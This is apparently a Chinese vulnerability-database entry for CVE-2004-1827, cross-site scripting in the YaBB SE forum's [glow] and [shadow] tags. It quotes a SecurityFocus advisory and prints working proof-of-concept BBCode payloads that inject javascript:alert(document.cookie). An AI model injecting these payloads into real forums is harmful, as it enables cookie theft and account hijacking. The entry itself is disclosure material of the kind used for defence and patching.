YABB SE多个跨站脚本执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107795 漏洞类型 输入验证
发布时间 2004-03-15 更新时间 2006-08-24
CVE编号 CVE-2004-1827 CNNVD-ID CNNVD-200403-063
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/23812
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-063
|漏洞详情
YabbSe是一款基于PHP/MySQL的论坛程序。YaBBSE由于不正确的过滤[glow]和[shadow]标记,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击,导致敏感信息泄露。在[glow]和[shadow]标记中加入恶意脚本代码,当浏览者读取包含此链接的页面,无需打开就会导致恶意脚本代码在用户浏览器上执行,可使目标用户敏感信息泄露。
|漏洞EXP
source: http://www.securityfocus.com/bid/9873/info

It has been reported that YaBB and YaBB SE are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly validate URI supplied user input.

Attackers may exploit this vulnerability to steal authentication credentials. Other attacks may also be possible.

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

The following proof of concept has been supplied by frog-m@n:
[glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]
|参考资料

来源:BID
名称:9873
链接:http://www.securityfocus.com/bid/9873
来源:SECUNIA
名称:11128
链接:http://secunia.com/advisories/11128
来源:XF
名称:yabb-glow-shadow-xss(15488)
链接:http://xforce.iss.net/xforce/xfdb/15488
来源:www.yabbforum.com
链接:http://www.yabbforum.com/community/YaBB.pl?board=general;action=display;num=1093133233
来源:SECTRACK
名称:1009427
链接:http://securitytracker.com/id?1009427
来源:BUGTRAQ
名称:20040316RE:YaBB/YaBBseCrossSiteScriptingVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107948064923981&w=2
来源:BUGTRAQ
名称:20040314YaBB/YaBBseCrossSiteScriptingVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107936800226430&w=2